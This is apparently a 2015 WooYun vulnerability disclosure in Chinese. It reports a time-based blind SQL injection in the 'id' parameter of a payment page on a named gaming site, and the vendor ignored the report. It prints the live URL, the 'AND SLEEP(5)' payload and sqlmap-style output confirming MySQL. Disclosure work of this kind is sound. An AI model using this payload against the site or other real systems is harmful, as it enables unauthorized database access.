漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-095590
漏洞标题:游侠网某站SQL注入
相关厂商:ali213.net
漏洞作者: 0x 80
提交时间:2015-02-04 13:08
修复时间:2015-02-09 13:10
公开时间:2015-02-09 13:10
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-02-04: 细节已通知厂商并且等待厂商处理中
2015-02-09: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
主要是我不玩游戏的
年轻人少玩游戏!告诫!
游侠网是中国的单机游戏门户,坚守单机阵地!鼎力支持正版游戏产业,弘扬单机文化!
游侠创作室成员在各大杂志媒体包括大众软件、大众游戏、家用电脑与游戏、电脑商情报、电脑报、软件与光盘、电脑游戏攻略、EPLAY等发表文章超过5000篇,多名创作室成员为各大杂志社的特约作者,国内十佳撰稿人的评选中游侠创作室拥有五个席位。
游侠网已与几乎所有厂商和媒体形成了良好的合作关系,网站上也开设了专区,及时发布最新讯息。并且与其他游戏公司联合举办各类市场推广活动,都取得巨大收益,游侠网从中获益匪浅。
详细说明:
http://shop.ali213.com/pay_go.php?id=1118
Place: GET
Parameter: id
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1118 AND SLEEP(5)
---
[12:55:18] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.11
漏洞证明:
修复方案:
参数
版权声明:转载请注明来源 0x 80@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2015-02-09 13:10
厂商回复:
最新状态:
暂无